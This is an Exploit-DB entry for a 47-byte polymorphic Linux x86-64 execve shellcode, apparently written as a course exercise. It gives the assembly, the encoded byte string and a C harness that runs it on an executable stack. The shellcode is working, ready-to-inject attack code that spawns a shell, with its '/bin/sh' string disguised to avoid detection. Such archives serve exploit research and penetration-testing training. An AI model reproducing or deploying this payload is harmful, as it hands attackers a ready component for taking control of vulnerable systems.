Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)

EDB-ID:

39390

Size:

47 bytes
EDB Verified:

Author:

Sathishshan

Type:

shellcode
Shellcode:   /  

Platform:

Linux_x86-64

Published:

2016-02-01
  
/*---------------------------------------------------------------------------------------------------------------------
/*
*Title:            x86_64 linux Polymorphic execve-stack 47 bytes
*Author:           Sathish kumar
*Contact:          https://www.linkedin.com/in/sathish94
* Copyright:       (c) 2016 iQube. (http://iQube.io)
* Release Date:    January 6, 2016
*Description:      X86_64 linux Polymorphic execve-stack 47 bytes
*Tested On:        Ubuntu 14.04 LTS
*SLAE64-1408
*Build/Run:        gcc -fno-stack-protector -z execstack sellcode.c -o shellcode
*                   ./shellcode
*                   
global _start

_start:

    xor esi, esi
    xor r15, r15
    mov r15w, 0x161f
    sub r15w, 0x1110
    push r15
    mov r15, rsp
    mov rdi, 0xff978cd091969dd0
    inc rdi
    neg rdi
    mul esi
    add al, 0x3b
    push rdi
    push rsp
    pop rdi
    call r15
*/


#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xf6\x4d\x31\xff\x66\x41\xbf\x1f\x16\x66\x41\x81\xef\x10\x11\x41\x57\x49\x89\xe7\x48\xbf\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xff\xc7\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x41\xff\xd7";
main()
{

	printf("Shellcode Length:  %d\n", (int)strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services